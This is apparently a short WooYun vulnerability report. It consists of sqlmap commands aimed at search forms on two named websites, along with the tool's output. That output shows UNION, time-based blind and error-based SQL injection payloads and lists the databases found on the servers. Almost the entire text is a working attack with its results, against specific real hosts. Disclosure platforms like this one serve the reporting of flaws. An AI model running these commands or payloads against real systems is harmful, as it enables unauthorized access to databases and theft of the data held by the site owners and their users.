WooYun.org

sqlmap -u "http://www.gdzjxf.com/php/search.php" --data "title=%25%27&imageField2.x=25&imageField2.y=2" -p title --dbs

Place: POST
Parameter: title
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: title=%' UNION ALL SELECT NULL,CONCAT(0x7177797771,0x6571437968424149596c,0x7165616571),NULL,NULL#&imageField2.x=15&imageField2.y=12
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: title=%' AND SLEEP(5)-- eoPK&imageField2.x=15&imageField2.y=12

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
available databases [16]:
[*] a12345
[*] country
[*] damei
[*] dfzz
[*] information_schema
[*] jiwei
[*] jiwei2
[*] mysql
[*] video
[*] wen
[*] wuchuan
[*] xf
[*] zjbx
[*] zjds
[*] zjds.bak
[*] zjwjmj

sqlmap -u "http://www.zjds.org/do/search.php?id=3&headID=1&footID=2&size=20" --data "keyword=%25%27" --dbs

Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-3757' OR 1 GROUP BY CONCAT(0x71766a7871,(SELECT (CASE WHEN (7538=7538) THEN 1 ELSE 0 END)),0x7165786d71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
available databases [1]:
[*] zjds